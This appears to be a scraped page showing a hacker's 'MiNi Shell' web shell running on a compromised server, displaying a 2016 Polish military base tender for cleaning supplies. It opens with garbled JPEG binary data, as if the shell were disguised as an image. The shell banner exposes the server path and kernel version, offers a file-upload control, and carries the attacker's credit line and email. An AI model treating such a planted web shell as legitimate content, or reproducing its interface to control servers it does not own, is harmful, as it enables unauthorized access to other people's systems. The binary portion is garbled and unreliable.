JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160622/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160622/98735-N-2016.html

<p class="kh_header"><b>Warszawa: Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego</b><br>
<b>Numer ogłoszenia: 98735 - 2016; data zamieszczenia: 22.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 1. Baza Lotnictwa Transportowego , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 261 821 316, faks 261 821 316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1bltr.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: 1. Baza Lotnictwa Transportowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego dla Infrastruktury.
Zadanie nr 2 - Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego dla Grupy Obsługi Technicznej.
Zadanie nr 3 - Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego dla Służby Żywnościowej.

 Szczegółowe określenie przedmiotu zamówienia znajduje się w opisie przedmiotu zamówienia - załącznik nr 1 ; 2 i 3 do SIWZ, znajdującego się na stronie internetowej Zamawiającego w zakładce - zamówienia publiczne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-0, 33.71.19.00-6, 39.22.43.00-1, 18.42.43.00-0, 18.90.00.00-8, 33.76.10.00-2, 33.76.30.00-9, 33.76.30.00-6, 39.83.12.50-3, 39.22.40.00-8, 19.52.00.00-7, 39.81.10.00-0, 39.83.10.00-6, 33.71.00.04-0, 33.71.15.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz cenowy na zadanie nr 1; 2 i 3 (zgodnie z załącznikami nr 7; 8 i 9 do SIWZ) 
2.	Dla zadania nr 1 i 2 - Karty charakterystyki preparatów chemicznych.
3.	Dla zadania nr 3 - Karty charakterystyki Produktu oraz Pozwolenie Ministra Zdrowia dopuszczające do obrotu dla wyrobów biobójczych.
4.	Dla zadania nr 3 - Certyfikat ISO 9001 dla pozycji nr  1, 2, 3, 4, 5, 6, 8, 11 przedmiotu zamówienia.
5. Oświadczenie o przynależności do grupy kapitałowej (art. 24 ust.2 pkt 5 ustawy Pzp.)
6. Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1bltr.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 50 pok. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 10:00, miejsce: 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 51 pok. nr 215 - Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego dla Infrastruktury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu,	Jm.	Ilość
1.	Produkt do mycia i konserwacji powierzchni ze stali nierdzewnej - l.  20
2.	Mydło do mycia rąk w płynie - l. 500
3.	Produkt do mycia i dezynfekcji pomieszczeń sanitarnych - l. 200
4.	Papier toaletowy miękki 100 % biały- rolka	25000
5.	Ręczniki papierowe, a150 szt. Listków w bindzie  100 % białe  - op.	150
6.	Ściereczka 40cmx40cm z mikrofibry  frote  - szt. 500
7.	Rękawice ochronne domowe - para	300
8	Płyn do mycia szyb okiennych - szt.	150
9.	Płyn do czyszczenia armatury łazienkowej (usuwający kamień  i rdzę) - szt. 500
10.	Worki na odpady 120 l - opak. 250
11.	Worki papierowe do odkurzacza PROFI 3 - szt. 100
12.	Worki papierowe do odkurzacza  PROFI 4 - szt.  100
13.	Worki na odpady 160 l - opak.	400
14.	Worki na śmieci 60 l - opak.	500
15.	Zmiotka i szufelką -  kpl. 100
16.	Kpl MOP (wiadro, wyciskacz, kij, końcówka MOP płaski z zaczepami typu  Ultramax )
	- szt.	25
17.	Szczotka do zamiatania + kij - szt.	120
18.	Wkład  do MOP  płaskiego z mikrowłókna (z zaczepami) typu Ultramax	- szt.	100
19.	Szczotka ulicówka  szer. 500 mm - 	szt.	30
20.	Wiadro gosp. o poj.12 l plastikowe z uchwytem plastikowym, - 	szt.	50
21.	Miska plastikowa  okrągła , 18 litrów -   	szt.	50
22.	Ścierka do podłogi z mikrofibry o wym.50x60 cm - szt.	300
23.	Wkład odświeżacza  powietrza  do  urządzenia AIR WICK - szt.	150
24.	Uniwersalny płyn do podłóg, mydło marsylskie  1,0  l               - szt.	400
25.	Kostka do WC  z koszykiem 40 g.      - szt.	1500
26.	Odświeżacz powietrza  w sprayu      300 ml        - szt.	500
27.	Pianka do mebli , drewna w sprayu     250 ml         - szt.	250
28.	Proszek do prania wykładzin i tapicerki  w urządzeniach Karcher   - szt.	3
29.	Sól tabletkowana do stacji uzdatniania wody  opak. 25 kg.        - szt.	50
30.	Pasta samopołyskowa  do nabłyszczania pvc, paneli  opak. 5 l    - szt.	60
31.	Mleczko  do czyszczenia wszelkich powierzchni   z uporczywym brudem 250 ml    - szt.	600
32.	Żel  na  kamień, rdze  opak.  500 g.    - szt.	500
33.	Płyn do mechanicznego czyszczenia podłóg w szorowarkach typu  NUMATIC opak. 10 litrów	
 	- szt.	20
Szczegółowe określenie przedmiotu zamówienia znajduje się w opisie przedmiotu zamówienia - załącznik nr 1do SIWZ, znajdującego się na stronie internetowej Zamawiającego w zakładce - zamówienia publiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-0, 33.71.19.00-6, 39.22.43.00-1, 18.42.43.00-0, 18.90.00.00-8, 33.76.10.00-2, 33.76.30.00-9, 33.76.30.00-6, 39.83.12.50-3, 39.22.40.00-8, 19.52.00.00-7, 39.81.10.00-0, 39.83.10.00-6, 33.71.11.40-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego dla Grupy Obsługi Technicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Ilość
1.	PIANKA CZYSZCZĄCA	 szt.	20
2.	ODPLAMIACZ w spray u	szt.	20
3.	ŚRODEK DO CZYSZCZENIA I PIELĘGNACJI DYWANÓW SPRAY	szt.	10
4.	CHUSTECZKI UNIWERSALNE	szt.	20
5.	RĘKAWICE DIAGNOSTYCZNE	op.	5
6.	SZAMPON DO PRANIA DYWANÓW szt.	10
7.	ŚRODEK DO PIELĘGNACJI MEBLI SPRAY 	szt.	20
8.	ODŚWIEŻACZ POWIETRZA SPRAY	szt.	20
9.	RĘCZNIK PAPIEROWY (KUCHENNY)	op.	30
10.	PAPIER TOALETOWY op.	20
11.	ŚRODEK DO UTYLIZAJI NIECZYSTOŚCI w saszetkach	op.	5
12.	WORKI NA ODPADY 35L	op.	50
13.	WORKI NA ODPADY 60L op.	20
14.	WORKI NA ODPADY 120L	op.	30
15.	TORBY CHOROBOWE PAPIEROWE	op.	20
16.	MYDŁO W PŁYNIE	op.	5
17.	UNIWERSALNY PŁYN DO CZYSZCZENIA	op.	30
18.	PROSZEK PIORĄCY DO ODKURZACZA PIORĄCEGO KARCHER PUZZI-200	op.	1
19.	ŚCIERKA UNIWERSALNA Z MIKROFIBRY	 szt.	100
20.	SZCZOTKA ZMIOTKA Z TWARDYM WŁOSIEM	szt.	20
21.	WIADERKO PLASTIKOWE	szt.	10
22.	RĘKAWICE GOSPODARCZE	op.	40
23.	PŁYN DO CZYSZCZENIA MEBLI 1L	op.	20
24.	PREPARAT DO CZYSZCZENIA TAPICERKI 650ML	szt.	20
25.	UNIWERSALNE CHUSTECZKI DO DEZYNFEKCJI	op.	10
26.	MLECZKO DO CZYSZCZENIA SKÓRY 500ML	szt.	5
27.	MYDŁO GLICERYNOWE DO SKÓR	op.	3
28.	ŚRODEK DO CZYSZCZENIA SKÓRY	op.	10
29.	ODŻYWKA DO SKÓR	op.	5
30.	PREPARAT DO KONSERWACJI WYROBÓW SKÓRZANYCH (BALSAM)	op.	5
31.	SZTYFT DO USUWANIA ŚLADÓW PO DŁUGOPISIE	szt.	3

Szczegółowe określenie przedmiotu zamówienia znajduje się w opisie przedmiotu zamówienia - załącznik nr 2 do SIWZ, znajdującego się na stronie internetowej Zamawiającego w zakładce - zamówienia publiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-0, 33.71.19.00-6, 39.22.43.00-1, 18.42.43.00-0, 18.90.00.00-8, 33.76.10.00-2, 33.76.30.00-9, 33.76.30.00-6, 39.83.12.50-3, 39.22.40.00-8, 19.52.00.00-7, 39.81.10.00-0, 39.83.10.00-6, 33.71.11.40-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa środków czystości i drobnego sprzętu gospodarczego dla Służby Żywnościowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment,	Jm,	Ilość
1.	Płyn do ręcznego mycia naczyń, porcelany, szkła, sztućców, sprzętu i wyposażenia kuchennego -	L.	400
2. Koncentrat płynu do mechanicznego mycia naczyń kuchennych, porcelany, szkła, sztućców, sprzętu i wyposażenia kuchennego- 	L.	200
3. Płyn do płukania i nabłyszczania w zmywarkach gastronomicznych naczyń kuchennych, porcelany, szkła, sztućców  -	L.	100
4. Preparat do dezynfekcji powierzchni mających kontakt z żywnością -	L.	18
5. Preparat w płynie do usuwania tłustych zabrudzeń z okapów kuchennych, blatów, stołów -	L.	18
6. Płyn czyszcząco-konserwujący do stali nierdzewnej -	L.	30
7. Preparat do mycia piecy konwekcyjno-parowych, piekarników, płyt grzewczych -	L.	24
8. Odkamieniacz do osadów mineralnych -	L.	18
9. Preparat do usuwania przypaleń i tłuszczu -	L.	12
10. Preparat do usuwania kamienia wapiennego i rdzy -	L.	12
11. Preparat do mycia i dezynfekcji powierzchni roboczych -	L.	40
12. Preparat do mycia i dezynfekcji powierzchni roboczych -	L.	50
13. Kapsuła do zmywarek -	op.	2
14. Mydło dezynfekujące w płynie do stosowania w zakładach żywienia zbiorowego -	L.	50
15. Sól do zmywarek -	kg	120
16. Tabletki do zmywarki -	op.	12
17. Odświeżacz do zmywarki -	szt.	18
18. Odkamieniacz w płynie do ekspresów -	szt.	12
19. Ręczniki papierowe - rolka przemysłowa (czyściwo) -	szt.	100
20. Reklamówki jednorazowe -	op.	100
21.Woreczki śniadaniowe -	op.	100
22. Woreczki strunowe -	op.	12
23. Woreczki do próżniowego pakowania 160 mm x 230 mm -	op.	30
24. Woreczki do próżniowego pakowania 250 mm x 350 mm -	op.	30
25. Folia pakowa spożywcza -	rol.	60
26. Folia pakowa aluminiowa gruba -	rol.	80
27. Rękawiczki lateksowe jednorazowe, bezpudrowe -	op.	100
28. Druciak  metalowy  do garnków - 	szt.	200
29. Gąbka do mycia ze zmywakiem -	op.	200
30. Ścierka o właściwościach antybakteryjnych, do stosowania w kuchni -	szt.	100
31. Płyn do czyszczenia układu mlecznego -	L.	24
32. Tabletki do czyszczenia ekspresu -	op.	12
33. Płyn do mycia i dezynfekcji urządzeń chłodniczych i mroźniczych -	L.	24
34. Fartuch kuchenny gumowy, gruby -	szt.	24
35. Smar do ekspresu -	szt.	12
36. Torebki papierowe do pakowania żywności -	kg	50
37. Patyczki drewniane do szaszłyków -	op.	30
38. Wykałaczki drewniane -	op.	30

Szczegółowe określenie przedmiotu zamówienia znajduje się w opisie przedmiotu zamówienia - załącznik nr 3 do SIWZ, znajdującego się na stronie internetowej Zamawiającego w zakładce - zamówienia publiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-0, 33.71.19.00-6, 39.22.43.00-1, 18.42.43.00-0, 18.90.00.00-8, 33.76.10.00-2, 33.76.30.00-9, 33.76.30.00-6, 39.83.12.50-3, 39.22.40.00-8, 19.52.00.00-7, 39.81.10.00-0, 39.83.10.00-6, 33.71.11.40-0, 33.71.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com